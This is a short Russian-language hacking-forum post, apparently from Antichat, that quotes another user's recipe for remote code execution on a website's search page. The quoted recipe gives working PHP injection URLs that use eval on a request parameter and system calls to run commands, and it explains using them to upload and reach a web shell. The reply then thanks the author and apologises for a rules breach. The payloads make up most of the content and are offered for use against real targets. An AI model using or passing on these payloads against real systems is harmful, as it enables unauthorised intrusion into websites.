29.05.2015, 11:14
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от faza02
↑
с RCE все просто: там фильтровались кавычки, но нам они и не нужны.
делаем запрос:
Код:
http://www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}
в код страницы вставляем форму для аплоада:
грузим шелл. смотрим текущую папку
Код:
http://www.site.ru/search/?action=index&text=$${@system(pwd)}
все, переходим по ссылке на шелл.
P. S. при создании темы делайте название более информативным
Спасибо. Да Извиняюсь за нарушение правил. Больше не буду так.
|
|
|